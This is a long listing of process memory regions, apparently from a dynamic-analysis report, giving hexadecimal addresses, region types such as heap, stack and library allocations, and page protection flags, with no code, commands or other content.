page read and write
7FFAAC7D0000
trusted library allocation
page read and write
F7FA9FF000
stack
page read and write
1DF1D6BB000
unclassified section
page read and write
1C8285C0000
heap
page read and write
2EE2BD50000
direct allocation
page read and write
7FFAAC5E0000
trusted library allocation
page read and write
2EE2BD70000
direct allocation
page read and write
2C388C48000
heap
page read and write
1DF03DB1000
trusted library allocation
page read and write
2EE285A4000
heap
page read and write
21E68B9A000
heap
page read and write
21E68BF8000
heap
page read and write
23F4BD40000
trusted library allocation
page read and write
23F4B113000
heap
page read and write
21E68BF5000
heap
page read and write
7FFAAC6F0000
trusted library allocation
page read and write
FD77CF7000
stack
page read and write
2B3C12BB000
trusted library allocation
page read and write
7FFAAC690000
trusted library allocation
page read and write
21E68B34000
heap
page read and write
20A6E153000
heap
page read and write
4114ECD000
stack
page read and write
411510C000
stack
page read and write
236B37C6000
trusted library allocation
page read and write
21E68BF8000
heap
page read and write
7FFAAC5C2000
trusted library allocation
page read and write
1DF01CBE000
heap
page read and write
7FFAAC940000
trusted library allocation
page read and write
2EE285F2000
heap
page read and write
21E68424000
heap
page read and write
236B3B4F000
trusted library allocation
page read and write
20A561D8000
trusted library allocation
page read and write
AD6C87C000
stack
page read and write
21E68BF1000
heap
page read and write
21E68A9A000
heap
page read and write
1DF01CE4000
heap
page read and write
236B15A0000
heap
page read and write
20A54010000
heap
page read and write
2B3C102D000
trusted library allocation
page read and write
7FFAAC5B6000
trusted library allocation
page read and write
21E6899F000
heap
page read and write
21E68996000
heap
page read and write
20A6E3D9000
heap
page read and write
21E68A1D000
heap
page read and write
23F50700000
heap
page read and write
7FFAAC6E0000
trusted library allocation
page read and write
21E68420000
heap
page read and write
20A540DF000
heap
page read and write
706833E000
stack
page read and write
1F2C7F90000
heap
page read and write
7FFAAC950000
trusted library allocation
page read and write
2607CBC000
stack
page read and write
7FFAAC710000
trusted library allocation
page read and write
7FFAAC730000
trusted library allocation
page read and write
20A6E412000
heap
page read and write
1DF62CF0000
direct allocation
page read and write
216661A9000
heap
page read and write
21E6843E000
heap
page read and write
236B4162000
trusted library allocation
page read and write
21E68C00000
heap
page read and write
C00043C000
direct allocation
page read and write
21E67E90000
heap
page read and write
236B469F000
trusted library allocation
page read and write
4113EFE000
stack
page read and write
21E68BF5000
heap
page read and write
2EE2BED0000
direct allocation
page read and write
21E68ABC000
heap
page read and write
2B3BE060000
heap
page read and write
AD6C77E000
unkown
page readonly
21E68C1B000
heap
page read and write
C00045C000
direct allocation
page read and write
AD6BCFE000
stack
page read and write
21E68B30000
heap
page read and write
21E68455000
heap
page read and write
21E68B74000
heap
page read and write
21E68BF8000
heap
page read and write
21E68A7A000
heap
page read and write
21E68C1B000
heap
page read and write
AD6C47E000
unkown
page readonly
2EE2859A000
heap
page read and write
1DF03750000
trusted library allocation
page read and write
C000010000
direct allocation
page read and write
21E689AA000
heap
page read and write
21E68C00000
heap
page read and write
2EE28583000
heap
page read and write
7FFAAC500000
trusted library allocation
page execute and read and write
21E68BF5000
heap
page read and write
2166620D000
heap
page read and write
21E68C1B000
heap
page read and write
21E6844C000
heap
page read and write
21E68C02000
heap
page read and write
1DF1BFEF000
heap
page read and write
236B1483000
trusted library allocation
page read and write
236B53E0000
trusted library allocation
page read and write
7DF453CC0000
trusted library allocation
page execute and read and write
1C828430000
heap
page read and write
236B460F000
trusted library allocation
page read and write
21E689C7000
heap
page read and write
20A6E4C2000
heap
page read and write
21666195000
heap
page read and write
216660E0000
heap
page read and write
1C828350000
heap
page read and write
6FB7EFD000
stack
page read and write
F8C13AC000
stack
page read and write
41141F9000
stack
page read and write
2EE2859E000
heap
page read and write
7FFB1E3A0000
unkown
page readonly
FD77EFF000
stack
page read and write
21E68B4A000
heap
page read and write
23F4C0D0000
trusted library section
page readonly
1DF1D6F6000
unclassified section
page write copy
21E68438000
heap
page read and write
1A3B3CA0000
heap
page read and write
2EE2BDF0000
direct allocation
page read and write
236B3733000
trusted library allocation
page read and write
21E68A7F000
heap
page read and write
2B3D7F6F000
heap
page read and write
21666173000
heap
page read and write
2EE28581000
heap
page read and write
23F5061F000
heap
page read and write
2EE285EF000
heap
page read and write
20A566FA000
trusted library allocation
page read and write
2B3BE0D9000
heap
page read and write
21E68C02000
heap
page read and write
C000082000
direct allocation
page read and write
2EE2BDD0000
direct allocation
page read and write
21E68444000
heap
page read and write
2EE2BEB0000
direct allocation
page read and write
7FFAAC868000
trusted library allocation
page read and write
23F4C0C0000
trusted library section
page readonly
216661EF000
heap
page read and write
260894F000
stack
page read and write
1DF1BFDB000
heap
page read and write
1DF1C035000
heap
page read and write
21E68BB5000
heap
page read and write
2EE29F80000
direct allocation
page read and write
2EE28730000
heap
page read and write
2B3BE240000
heap
page execute and read and write
2B3BE000000
heap
page read and write
2EE285C8000
heap
page read and write
2C388C40000
heap
page read and write
20A55C40000
heap
page read and write
2B3BE128000
heap
page read and write
7FFAAC5F0000
trusted library allocation
page read and write
2B3C1573000
trusted library allocation
page read and write
21E68438000
heap
page read and write
21666151000
heap
page read and write
7FFAAC4C6000
trusted library allocation
page execute and read and write
21E689A4000
heap
page read and write
23F50519000
trusted library allocation
page read and write
7FFB1E3C5000
unkown
page readonly
21E68444000
heap
page read and write
2608C4E000
stack
page read and write
7FFAAC970000
trusted library allocation
page read and write
21E68A66000
heap
page read and write
1DF1C057000
heap
page read and write
2C388DE0000
heap
page read and write
236B373B000
trusted library allocation
page read and write
1DF03A30000
heap
page read and write
7FFB1E3B9000
unkown
page readonly
C000400000
direct allocation
page read and write
C000140000
direct allocation
page read and write
AD6C57E000
stack
page read and write
70678C3000
stack
page read and write
C000450000
direct allocation
page read and write
1DF03660000
heap
page read and write
C0004AA000
direct allocation
page read and write
21E68B6F000
heap
page read and write
236B1ACC000
trusted library allocation
page read and write
23F50620000
trusted library allocation
page read and write
236B24D9000
trusted library allocation
page read and write
7FFAAC770000
trusted library allocation
page read and write
20A542C0000
heap
page readonly
2B3D8603000
heap
page read and write
236B45CA000
trusted library allocation
page read and write
21E68B9D000
heap
page read and write
21E689C2000
heap
page read and write
2EE2BE10000
direct allocation
page read and write
7FFAAC4A0000
trusted library allocation
page read and write
21E68B4A000
heap
page read and write
1DF03DD2000
trusted library allocation
page read and write
21E68441000
heap
page read and write
21E68434000
heap
page read and write
21E68C0A000
heap
page read and write
2B3BFC51000
trusted library allocation
page read and write
7FFAAC730000
trusted library allocation
page read and write
C000042000
direct allocation
page read and write
20A54250000
heap
page read and write
1DF01CA0000
heap
page read and write
7FFAAC73C000
trusted library allocation
page read and write
20A6E4A6000
heap
page read and write
21667B4D000
heap
page read and write
AD6D2FE000
stack
page read and write
2EE285D0000
heap
page read and write
C00004B000
direct allocation
page read and write
70679CE000
stack
page read and write
1DF1C3C0000
direct allocation
page execute and read and write
7FFAAC580000
trusted library allocation
page read and write
AD6C5FE000
stack
page read and write
7FFAAC780000
trusted library allocation
page read and write
21E6844C000
heap
page read and write
21E68C00000
heap
page read and write
7FFAAC750000
trusted library allocation
page read and write
AD6BB7E000
unkown
page readonly
260777D000
stack
page read and write
236B41D0000
trusted library allocation
page read and write
21E68BF5000
heap
page read and write
21E68B30000
heap
page read and write
32779FD000
stack
page read and write
7FFAAC5DA000
trusted library allocation
page read and write
2EE2C0B0000
direct allocation
page read and write
7FFAAC854000
trusted library allocation
page read and write
21E68A63000
heap
page read and write
26089CA000
stack
page read and write
C00021D000
direct allocation
page read and write
2E7C79F0000
heap
page read and write
1DF1C039000
heap
page read and write
C000060000
direct allocation
page read and write
21E68BF5000
heap
page read and write
7FFAAC780000
trusted library allocation
page read and write
21E68AAB000
heap
page read and write
C00016C000
direct allocation
page read and write
2B3D8030000
heap
page execute and read and write
21E68BF8000
heap
page read and write
7FFAAC600000
trusted library allocation
page read and write
7FFAAC5D2000
trusted library allocation
page read and write
23F50500000
trusted library allocation
page read and write
21E68B64000
heap
page read and write
21E6AC40000
heap
page read and write
BB8F0FB000
stack
page read and write
2EE2BE50000
direct allocation
page read and write
23F504C0000
trusted library allocation
page read and write
20A54106000
heap
page read and write
21E68921000
heap
page read and write
7FFAAC660000
trusted library allocation
page read and write
2B93EAC000
stack
page read and write
20A6E236000
heap
page read and write
1DF62CB5000
direct allocation
page read and write
2607BBF000
stack
page read and write
236AFBB8000
heap
page read and write
7067D79000
stack
page read and write
7FFAAC3E4000
trusted library allocation
page read and write
21E68B30000
heap
page read and write
2EE2BDB0000
direct allocation
page read and write
2EE28549000
heap
page read and write
236AFB8C000
heap
page read and write
2607B39000
stack
page read and write
21E68AB9000
heap
page read and write
21E689F4000
heap
page read and write
21E68B24000
heap
page read and write
7FFAAC740000
trusted library allocation
page read and write
1A3B5850000
heap
page read and write
23F5065F000
heap
page read and write
2EE2857E000
heap
page read and write
706823E000
stack
page read and write
C000004000
direct allocation
page read and write
1DF13A41000
trusted library allocation
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
2EE2BE30000
direct allocation
page read and write
21E68998000
heap
page read and write
E339EFF000
stack
page read and write
23F4B95A000
heap
page read and write
1DF01E80000
heap
page read and write
2A801E30000
heap
page read and write
23F506FB000
heap
page read and write
2E7C78F0000
heap
page read and write
236B345A000
trusted library allocation
page read and write
4113C73000
stack
page read and write
7FFAAC4A6000
trusted library allocation
page read and write
23F50500000
trusted library allocation
page read and write
4113DFE000
stack
page read and write
236B5455000
trusted library allocation
page read and write
FD77DFE000
stack
page read and write
2166611F000
heap
page read and write
2EE285F9000
heap
page read and write
21E68B4A000
heap
page read and write
236B4582000
trusted library allocation
page read and write
7FFB167B0000
unkown
page read and write
7FFAAC3FD000
trusted library allocation
page execute and read and write
1A3B3E99000
heap
page read and write
20A6E1C9000
heap
page read and write
2B3D8238000
heap
page read and write
2EE2BE90000
direct allocation
page read and write
236B45B0000
trusted library allocation
page read and write
C000098000
direct allocation
page read and write
21E68A0F000
heap
page read and write
2B3D82C4000
heap
page read and write
20A55C30000
trusted library allocation
page read and write
7FFB16791000
unkown
page execute read
21E68C02000
heap
page read and write
21E68B30000
heap
page read and write
2B3BE1F0000
trusted library allocation
page read and write
23F4BED0000
trusted library allocation
page read and write
C00005C000
direct allocation
page read and write
21E68C02000
heap
page read and write
1DF039C0000
heap
page execute and read and write
C0001A2000
direct allocation
page read and write
21E68B30000
heap
page read and write
6FB7DFE000
stack
page read and write
20A55B50000
heap
page execute and read and write
23F4B670000
trusted library allocation
page read and write
2EE285D1000
heap
page read and write
20A55C44000
heap
page read and write
21E68C02000
heap
page read and write
236B45DE000
trusted library allocation
page read and write
C000148000
direct allocation
page read and write
20A56B98000
trusted library allocation
page read and write
216661A1000
heap
page read and write
21E68B44000
heap
page read and write
7FFAAC5C5000
trusted library allocation
page read and write
21E68BF8000
heap
page read and write
C0004C4000
direct allocation
page read and write
AD6B67E000
unkown
page readonly
2B3D7F96000
heap
page read and write
2EE28561000
heap
page read and write
21E68C1B000
heap
page read and write
21E68A60000
heap
page read and write
21E68C00000
heap
page read and write
7FFAAC710000
trusted library allocation
page read and write
21E68BAA000
heap
page read and write
236B414E000
trusted library allocation
page read and write
236B4030000
trusted library allocation
page read and write
2EE2857E000
heap
page read and write
2EE28600000
heap
page read and write
C000086000
direct allocation
page read and write
2608A4D000
stack
page read and write
2EE2861A000
heap
page read and write
FD77FFE000
stack
page read and write
7FFAAC7E0000
trusted library allocation
page read and write
21E68BF8000
heap
page read and write
7FFAAC490000
trusted library allocation
page read and write
23F4C0B0000
trusted library section
page readonly
2EE29F60000
direct allocation
page read and write
21E68BF8000
heap
page read and write
C00003D000
direct allocation
page read and write
2C388C50000
heap
page read and write
21E68942000
heap
page read and write
23F50704000
heap
page read and write
AD6C07E000
unkown
page readonly
21E68973000
heap
page read and write
2B3D8710000
heap
page read and write
236B45E0000
trusted library allocation
page read and write
21E68C00000
heap
page read and write
2B3D8700000
heap
page read and write
23F504C0000
trusted library allocation
page read and write
1DF01D70000
heap
page read and write
23F4B02B000
heap
page read and write
2EE28619000
heap
page read and write
2EE2C0E5000
direct allocation
page read and write
1DF1DA97000
unclassified section
page read and write
1DF62D71000
direct allocation
page read and write
21E68BF8000
heap
page read and write
C000142000
direct allocation
page read and write
23F4B102000
heap
page read and write
1DF15869000
trusted library allocation
page read and write
21E6899F000
heap
page read and write
21E68BF5000
heap
page read and write
C000516000
direct allocation
page read and write
20A57CAE000
trusted library allocation
page read and write
20A56140000
heap
page execute and read and write
7FFAAC740000
trusted library allocation
page read and write
2EE2BFD0000
direct allocation
page read and write
2B3D85A0000
trusted library section
page read and write
21E68455000
heap
page read and write
7FFAAC7A0000
trusted library allocation
page read and write
2B3BE1C0000
trusted library allocation
page read and write
411540A000
stack
page read and write
21E68C1B000
heap
page read and write
C00021F000
direct allocation
page read and write
21E68BF1000
heap
page read and write
1DF03C68000
trusted library allocation
page read and write
7FFAAC51B000
trusted library allocation
page read and write
7068E0E000
stack
page read and write
2EE285F7000
heap
page read and write
1DF1CB60000
direct allocation
page read and write
21E6845E000
heap
page read and write
2EE28610000
heap
page read and write
20A572BD000
trusted library allocation
page read and write
C000156000
direct allocation
page read and write
1DF14469000
trusted library allocation
page read and write
21E68BF8000
heap
page read and write
21E68B75000
heap
page read and write
7FFAAC4B0000
trusted library allocation
page execute and read and write
7FFAAC5C0000
trusted library allocation
page execute and read and write
20A6E3F6000
heap
page read and write
1A3B3EBE000
heap
page read and write
20A540BE000
heap
page read and write
7FFB1E3C0000
unkown
page read and write
1DF03A41000
trusted library allocation
page read and write
216661C6000
heap
page read and write
2607978000
stack
page read and write
1DF1BD80000
heap
page read and write
20A56151000
trusted library allocation
page read and write
7FFAAC640000
trusted library allocation
page read and write
2B3C10BF000
trusted library allocation
page read and write
1DF03E6F000
trusted library allocation
page read and write
2EE2BF90000
direct allocation
page read and write
20A6E4EC000
heap
page read and write
7068037000
stack
page read and write
1A3B3E70000
heap
page read and write
2EE2858C000
heap
page read and write
23F4C440000
trusted library allocation
page read and write
2EE285EE000
heap
page read and write
23F504B0000
trusted library allocation
page read and write
C00009A000
direct allocation
page read and write
2EE285FB000
heap
page read and write
C000146000
direct allocation
page read and write
C000221000
direct allocation
page read and write
1DF1D6C3000
unclassified section
page write copy
2EE2BF27000
direct allocation
page read and write
21E68B4D000
heap
page read and write
21E68C1B000
heap
page read and write
7FFAAC592000
trusted library allocation
page read and write
20A542D0000
trusted library allocation
page read and write
7FFAAC503000
trusted library allocation
page execute and read and write
21666195000
heap
page read and write
2B3BE250000
heap
page read and write
21E68C02000
heap
page read and write
21E68434000
heap
page read and write
2B3BE0E5000
heap
page read and write
21E68C1B000
heap
page read and write
21E68BF1000
heap
page read and write
7FFB167B2000
unkown
page readonly
1DF03790000
heap
page execute and read and write
23F4B0B7000
heap
page read and write
21E68C00000
heap
page read and write
7FFB1E3C0000
unkown
page read and write
21E68110000
heap
page read and write
236AFBB5000
heap
page read and write
4114D7D000
stack
page read and write
BB8E7FE000
stack
page read and write
7FFAAC860000
trusted library allocation
page read and write
23F504E0000
trusted library allocation
page read and write
20A54300000
heap
page read and write
4114E4E000
stack
page read and write
236AFB6C000
heap
page read and write
236B1790000
heap
page execute and read and write
20A540C3000
heap
page read and write
21E68455000
heap
page read and write
7FFAAC6E4000
trusted library allocation
page read and write
21E68B4A000
heap
page read and write
21E68C00000
heap
page read and write
2E7C7AD0000
heap
page read and write
21E68C00000
heap
page read and write
2EE2C050000
direct allocation
page read and write
21E68C02000
heap
page read and write
C000136000
direct allocation
page read and write
236B53BE000
trusted library allocation
page read and write
21E68C02000
heap
page read and write
7FFAAC6D0000
trusted library allocation
page read and write
21666158000
heap
page read and write
2B3C1317000
trusted library allocation
page read and write
21E68C0A000
heap
page read and write
2EE2BF70000
direct allocation
page read and write
2B3D7A50000
trusted library allocation
page read and write
2EE28585000
heap
page read and write
7FFAAC870000
trusted library allocation
page read and write
2EE28520000
heap
page read and write
21E68C00000
heap
page read and write
1DF1C210000
direct allocation
page read and write
2EE285C1000
heap
page read and write
21E68C1B000
heap
page read and write
2EE2859E000
heap
page read and write
21E68AD8000
heap
page read and write
1A3B3ECA000
heap
page read and write
7FFAAC850000
trusted library allocation
page read and write
C000106000
direct allocation
page read and write
AD6B57C000
stack
page read and write
7FFAAC968000
trusted library allocation
page read and write
2B3D85C0000
heap
page read and write
2EE2858A000
heap
page read and write
C000031000
direct allocation
page read and write
21E67EAE000
heap
page read and write
7FFAAC750000
trusted library allocation
page read and write
23F506C0000
heap
page read and write
260880D000
stack
page read and write
7FFAAC3ED000
trusted library allocation
page execute and read and write
21E68AEA000
heap
page read and write
21E68420000
heap
page read and write
7FFAAC700000
trusted library allocation
page read and write
21E68C0A000
heap
page read and write
23F4B802000
heap
page read and write
21E6899F000
heap
page read and write
BB8EF7E000
stack
page read and write
1DF1D6FB000
unclassified section
page write copy
21E68C0A000
heap
page read and write
23F5064A000
heap
page read and write
7FFAAC6B0000
trusted library allocation
page read and write
AD6C97E000
unkown
page readonly
21E68AFB000
heap
page read and write
21666165000
heap
page read and write
1A3B3E99000
heap
page read and write
2B3BE166000
heap
page read and write
23F50641000
heap
page read and write
1DF1C016000
heap
page read and write
20A569DC000
trusted library allocation
page read and write
7FFAAC859000
trusted library allocation
page read and write
21E68BF1000
heap
page read and write
AD6C3FE000
stack
page read and write
7FFAAC770000
trusted library allocation
page read and write
7FFAAC510000
trusted library allocation
page execute and read and write
236B1AC6000
trusted library allocation
page read and write
236B45C4000
trusted library allocation
page read and write
236B4658000
trusted library allocation
page read and write
2EE28594000
heap
page read and write
21E68451000
heap
page read and write
7FFAAC5F0000
trusted library allocation
page read and write
2EE2C030000
direct allocation
page read and write
21E68C0A000
heap
page read and write
260787E000
stack
page read and write
21E68A80000
heap
page read and write
2E7C7C14000
heap
page read and write
236B40F4000
trusted library allocation
page read and write
1DF1D6BE000
unclassified section
page write copy
C0001B4000
direct allocation
page read and write
F8C17FF000
stack
page read and write
21E68A1D000
heap
page read and write
21E68B4A000
heap
page read and write
1DF1C190000
direct allocation
page read and write
C0000DE000
direct allocation
page read and write
FD7844E000
stack
page read and write
2EE2BD90000
direct allocation
page read and write
1C828250000
heap
page read and write
2B3BE0A0000
heap
page read and write
1DF1C790000
direct allocation
page read and write
1DF1BEA5000
heap
page read and write
21E68452000
heap
page read and write
23F4B800000
heap
page read and write
21E6845E000
heap
page read and write
23F4B000000
heap
page read and write
21E68BF8000
heap
page read and write
7FFAAC650000
trusted library allocation
page read and write
23F4BFC0000
trusted library allocation
page read and write
7FFAAC620000
trusted library allocation
page read and write
23F4B09E000
heap
page read and write
21E68BAF000
heap
page read and write
21E68BF1000
heap
page read and write
20A66448000
trusted library allocation
page read and write
2B3D8110000
heap
page read and write
21E68C0A000
heap
page read and write
21E68BF8000
heap
page read and write
2B3D8600000
heap
page read and write
7067C7E000
stack
page read and write
21E68A60000
heap
page read and write
236B1420000
trusted library section
page read and write
2B3BDF20000
heap
page read and write
236B465B000
trusted library allocation
page read and write
4115187000
stack
page read and write
236B3737000
trusted library allocation
page read and write
21E6844C000
heap
page read and write
A9F7B5D000
stack
page read and write
7FFAAC990000
trusted library allocation
page read and write
21E6843C000
heap
page read and write
2EE2A170000
heap
page read and write
23F506D7000
heap
page read and write
21E68A98000
heap
page read and write
21E689C9000
heap
page read and write
2B3D829E000
heap
page read and write
20A6E24A000
heap
page read and write
20A5688A000
trusted library allocation
page read and write
C000209000
direct allocation
page read and write
21E68451000
heap
page read and write
236B4D6C000
trusted library allocation
page read and write
236B31E3000
trusted library allocation
page read and write
21E683F0000
heap
page read and write
23F4B0FF000
heap
page read and write
2B3BE0FB000
heap
page read and write
C000038000
direct allocation
page read and write
7FFAAC960000
trusted library allocation
page read and write
236B1480000
trusted library allocation
page read and write
21E68B04000
heap
page read and write
411427D000
stack
page read and write
2B3D7F44000
heap
page read and write
70681BE000
stack
page read and write
7FFAAC6F0000
trusted library allocation
page read and write
236B1460000
trusted library allocation
page read and write
21E68438000
heap
page read and write
7FFAAC5A0000
trusted library allocation
page execute and read and write
C000144000
direct allocation
page read and write
C000214000
direct allocation
page read and write
1DF1C200000
direct allocation
page read and write
23F4B900000
heap
page read and write
21E68A98000
heap
page read and write
2EE28612000
heap
page read and write
21E68AA5000
heap
page read and write
2B3BE0DB000
heap
page read and write
7FFAAC900000
trusted library allocation
page read and write
2166617A000
heap
page read and write
1DF13ACC000
trusted library allocation
page read and write
21E68C02000
heap
page read and write
2B3CFA21000
trusted library allocation
page read and write
1DF62D10000
direct allocation
page read and write
21E6AC46000
heap
page read and write
21E68B6F000
heap
page read and write
7FFAAC49C000
trusted library allocation
page execute and read and write
7FFAAC3E2000
trusted library allocation
page read and write
7067FBF000
stack
page read and write
2166617A000
heap
page read and write
21E68B95000
heap
page read and write
23F506D5000
heap
page read and write
21E68B5D000
heap
page read and write
C0003F4000
direct allocation
page read and write
1DF03DAE000
trusted library allocation
page read and write
1DF1C03F000
heap
page read and write
41143FB000
stack
page read and write
21E67EA9000
heap
page read and write
7FFAAC910000
trusted library allocation
page read and write
21666195000
heap
page read and write
2B3C0D64000
trusted library allocation
page read and write
2B3BFAAA000
trusted library allocation
page read and write
20A6E367000
heap
page read and write
23F506C2000
heap
page read and write
7FFAAC510000
trusted library allocation
page read and write
7FFAAC6C0000
trusted library allocation
page execute and read and write
216662E0000
heap
page read and write
C000228000
direct allocation
page read and write
7DF453CA0000
trusted library allocation
page execute and read and write
1DF1DA98000
unclassified section
page readonly
21E68BF8000
heap
page read and write
2B3C103F000
trusted library allocation
page read and write
20A542B0000
trusted library allocation
page read and write
21E68944000
heap
page read and write
23F4BEA1000
trusted library allocation
page read and write
21E67E94000
heap
page read and write
21E68C1B000
heap
page read and write
21E68C1B000
heap
page read and write
C000094000
direct allocation
page read and write
23F4B08D000
heap
page read and write
21E68455000
heap
page read and write
2607ABA000
stack
page read and write
2B3D7A9A000
heap
page read and write
7FFAAC5E6000
trusted library allocation
page execute and read and write
2EE2859E000
heap
page read and write
1DF1BDE9000
heap
page read and write
AD6BE7E000
unkown
page readonly
20A5410C000
heap
page read and write
2EE2C090000
direct allocation
page read and write
20A57EA4000
trusted library allocation
page read and write
7FFAAC3F2000
trusted library allocation
page read and write
C000466000
direct allocation
page read and write
23F50860000
remote allocation
page read and write
7FFAAC8F3000
trusted library allocation
page read and write
236B4644000
trusted library allocation
page read and write
2B3D8573000
heap
page read and write
7FFB1E3A1000
unkown
page execute read
1A3B3DB0000
heap
page read and write
21E68C0A000
heap
page read and write
23F50860000
remote allocation
page read and write
1A3B3DC0000
heap
page read and write
C000456000
direct allocation
page read and write
20A6E49A000
heap
page read and write
23F50860000
remote allocation
page read and write
21666151000
heap
page read and write
20A6E46D000
heap
page read and write
21E6AC49000
heap
page read and write
1DF0383D000
heap
page read and write
2A802254000
heap
page read and write
7FFAAC700000
trusted library allocation
page read and write
21E68C02000
heap
page read and write
236AFBB3000
heap
page read and write
20A6E150000
heap
page read and write
21666175000
heap
page read and write
21E68B66000
heap
page read and write
AD6BA7E000
unkown
page readonly
4114F0E000
stack
page read and write
1F2C7C30000
heap
page read and write
236B45AE000
trusted library allocation
page read and write
1DF1D6C2000
unclassified section
page read and write
2B3BE1E6000
heap
page read and write
21E68420000
heap
page read and write
21E689CB000
heap
page read and write
C000150000
direct allocation
page read and write
236B15B9000
heap
page read and write
1F2C7DAB000
heap
page read and write
236B459A000
trusted library allocation
page read and write
2B3D8001000
heap
page read and write
7FFAAC700000
trusted library allocation
page read and write
236B14F0000
trusted library allocation
page read and write
2B3C1049000
trusted library allocation
page read and write
1DF1C194000
direct allocation
page read and write
21E68A20000
heap
page read and write
21E68C1B000
heap
page read and write
21E68451000
heap
page read and write
21E68C0A000
heap
page read and write
C00020F000
direct allocation
page read and write
21E68BF1000
heap
page read and write
2EE2859E000
heap
page read and write
20A55B57000
heap
page execute and read and write
1DF1BF80000
heap
page read and write
C000223000
direct allocation
page read and write
1F2C7D10000
heap
page read and write
2EE285D4000
heap
page read and write
21E68BBF000
heap
page read and write
7FFAAC86C000
trusted library allocation
page read and write
7FFAAC5D0000
trusted library allocation
page execute and read and write
C00020D000
direct allocation
page read and write
2B3D81FC000
heap
page read and write
7FFAAC710000
trusted library allocation
page read and write
1DF62CB1000
direct allocation
page read and write
1A3B3E99000
heap
page read and write
21E68987000
heap
page read and write
216661E2000
heap
page read and write
C000062000
direct allocation
page read and write
20A66163000
trusted library allocation
page read and write
21E68C02000
heap
page read and write
20A55B90000
heap
page read and write
1DF03E1E000
trusted library allocation
page read and write
2EE284F0000
heap
page read and write
1A3B3E87000
heap
page read and write
1A3B3E8A000
heap
page read and write
2EE285FB000
heap
page read and write
E339E7C000
stack
page read and write
236B4640000
trusted library allocation
page read and write
1F2C7DA8000
heap
page read and write
260878E000
stack
page read and write
20A6E3B7000
heap
page read and write
216661C6000
heap
page read and write
7FFAAC690000
trusted library allocation
page read and write
21E68BAA000
heap
page read and write
1DF13A61000
trusted library allocation
page read and write
21E6AC49000
heap
page read and write
2EE28613000
heap
page read and write
216661B6000
heap
page read and write
7FFAAC6C0000
trusted library allocation
page read and write
BB8EA7E000
stack
page read and write
21E68BF1000
heap
page read and write
AD6C6FE000
unkown
page readonly
21667AC0000
trusted library allocation
page read and write
2EE2BFF0000
direct allocation
page read and write
21E6AC56000
heap
page read and write
7FFAAC7B0000
trusted library allocation
page read and write
21E68C1B000
heap
page read and write
7FFAAC600000
trusted library allocation
page read and write
1DF1DA9D000
unclassified section
page readonly
23F50440000
trusted library allocation
page read and write
AD6BD7E000
unkown
page readonly
21E68C1B000
heap
page read and write
7FFB1E3C0000
unkown
page read and write
216661FF000
heap
page read and write
21E68B04000
heap
page read and write
21E68C0C000
heap
page read and write
236B4674000
trusted library allocation
page read and write
21E68A9B000
heap
page read and write
C0003F6000
direct allocation
page read and write
AD6CA7E000
stack
page read and write
2B3CFD0B000
trusted library allocation
page read and write
C000058000
direct allocation
page read and write
1DF62D79000
direct allocation
page read and write
2B3D81F0000
heap
page read and write
21E68444000
heap
page read and write
236B41EA000
trusted library allocation
page read and write
C0000BA000
direct allocation
page read and write
6FB79D4000
stack
page read and write
4115488000
stack
page read and write
C0000A4000
direct allocation
page read and write
1DF1D6C0000
unclassified section
page write copy
BB8FC4D000
stack
page read and write
7FFAAC680000
trusted library allocation
page read and write
2EE28593000
heap
page read and write
21E68A1D000
heap
page read and write
A9F7BDF000
stack
page read and write
1DF01CA4000
heap
page read and write
1DF1DA90000
unclassified section
page read and write
C00022A000
direct allocation
page read and write
1DF01E70000
heap
page read and write
1F2C7F94000
heap
page read and write
BB8E7BE000
unkown
page read and write
20A66440000
trusted library allocation
page read and write
21E68A10000
heap
page read and write
7FFAAC930000
trusted library allocation
page execute and read and write
2B3BE0E9000
heap
page read and write
1DF03796000
heap
page execute and read and write
21E6845E000
heap
page read and write
1C828258000
heap
page read and write
7FFAAC6E2000
trusted library allocation
page read and write
7FFAAC5D5000
trusted library allocation
page read and write
21E68A9E000
heap
page read and write
21E6844C000
heap
page read and write
23F506C7000
heap
page read and write
7FFAAC59A000
trusted library allocation
page read and write
21E68A04000
heap
page read and write
20A6E483000
heap
page read and write
21E68B4A000
heap
page read and write
20A6643B000
trusted library allocation
page read and write
21E68BF5000
heap
page read and write
1DF03836000
heap
page read and write
1A3B5A00000
heap
page read and write
21E68451000
heap
page read and write
23F504F0000
trusted library allocation
page read and write
21E68987000
heap
page read and write
2EE285E8000
heap
page read and write
26076FE000
stack
page read and write
21E68BAE000
heap
page read and write
2EE2859E000
heap
page read and write
21E68451000
heap
page read and write
1DF01C9D000
heap
page read and write
21E68BF1000
heap
page read and write
2608B4E000
stack
page read and write
2B3C104D000
trusted library allocation
page read and write
7FFAAC3F0000
trusted library allocation
page read and write
21E6843D000
heap
page read and write
21E68BF1000
heap
page read and write
23F504C1000
trusted library allocation
page read and write
7FFAAC504000
trusted library allocation
page read and write
21E68447000
heap
page read and write
2EE2858B000
heap
page read and write
2B3D7FEA000
heap
page read and write
20A6E270000
heap
page read and write
21666136000
heap
page read and write
21E68B58000
heap
page read and write
2EE2C040000
direct allocation
page read and write
2608BCD000
stack
page read and write
1DF03833000
heap
page read and write
20A6E439000
heap
page read and write
21E68C0A000
heap
page read and write
7FFAAC5C0000
trusted library allocation
page execute and read and write
2EE29FA0000
heap
page read and write
2EE285DC000
heap
page read and write
7FFB1E3B6000
unkown
page readonly
21E68B09000
heap
page read and write
1DF13AB0000
trusted library allocation
page read and write
21E68A3A000
heap
page read and write
C000122000
direct allocation
page read and write
21E68BF8000
heap
page read and write
7FFB1E3BD000
unkown
page readonly
20A661C2000
trusted library allocation
page read and write
2A801E20000
heap
page read and write
23F5070C000
heap
page read and write
C000585000
direct allocation
page read and write
23F50707000
heap
page read and write
C000033000
direct allocation
page read and write
260767E000
stack
page read and write
7FFAAC760000
trusted library allocation
page read and write
7FFAAC830000
trusted library allocation
page read and write
7FFAAC3F3000
trusted library allocation
page execute and read and write
26073FE000
stack
page read and write
23F504A0000
trusted library allocation
page read and write
21E68C0B000
heap
page read and write
AD6CD7E000
unkown
page readonly
1DF1C270000
heap
page read and write
2EE29F67000
direct allocation
page read and write
21E6AC56000
heap
page read and write
216660B0000
heap
page read and write
216661A9000
heap
page read and write
21E6CE50000
heap
page read and write
7FFAAC810000
trusted library allocation
page read and write
21E68B75000
heap
page read and write
1F2C7D30000
heap
page read and write
1DF1DA22000
unclassified section
page read and write
21E68920000
heap
page read and write
21E68A43000
heap
page read and write
C00020B000
direct allocation
page read and write
21E68C1B000
heap
page read and write
21E689BF000
heap
page read and write
21E68C0A000
heap
page read and write
7067E79000
stack
page read and write
1DF62D13000
direct allocation
page read and write
1DF1DA28000
unclassified section
page read and write
21E68C02000
heap
page read and write
